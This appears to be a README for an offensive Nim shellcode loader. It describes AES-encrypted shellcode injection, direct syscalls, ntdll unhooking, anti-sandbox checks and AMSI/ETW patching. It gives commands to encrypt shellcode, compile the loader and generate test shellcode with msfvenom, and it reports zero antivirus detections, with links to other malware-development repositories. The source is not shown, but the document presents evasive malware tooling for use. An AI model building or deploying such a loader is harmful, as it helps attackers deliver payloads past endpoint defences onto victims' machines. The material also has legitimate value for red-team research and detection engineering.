Shellcode loader with evasion capabilities written in Nim
- Inject AES encrypted shellcode
- Direct syscalls by retrieving STUBS during runtime
- ntdll.dll unhooking
- Basic anti-sandbox checks
- AMSI and ETW patching
- Custom sleep function
This loader makes use of the AES encryption algorithm so in order to make it work, you need to encrypt your own shellcode. To do so you may use either aes_encrypt.py or aes_encrypt.nim. Both scripts will generate a random PSK and IV and it will take care of encrypting your shellcode so that you only have to modify the variables at the very top of the file.
Encrypt your raw shellcode:
$ nim r aes_encrypt.nim calc.binor
$ python3 aes_encrypt.py calc.binOnce you have modified nimbus.nim to suit your needs, you just have to compile it like this:
$ nim c -d=mingw -d:release --cpu=amd64 nimbus.nimOr simply using make:
$ makeYou need to have installed nim and some specific packages:
$ nimble install winim nimcrypto psutil ptr_math
For testing purposes I have used a simple calc.exe shellcode. You can generate it using msfvenom like this:
$ msfvenom -p windows/x64/exec CMD="calc.exe" -f raw -o calc.binTested on x64
As can be seen, the shellcode gets decrypted and injected successfully
If I upload the EXE to KleenScan (an alternative to VirusTotal that promises not to distribute the malware) we see that it seems legit with 0 detections
https://github.com/byt3bl33d3r/OffensiveNim
https://github.com/S3cur3Th1sSh1t/NimGetSyscallStub
https://github.com/itaymigdal/PartyLoader
https://github.com/RistBS/Awesome-RedTeam-Cheatsheet
https://github.com/S3cur3Th1sSh1t/Nim-RunPE
https://github.com/icyguider/Nimcrypt2
https://github.com/chvancooten/maldev-for-dummies
https://redops.at/en/blog/syscalls-via-vectored-exception-handling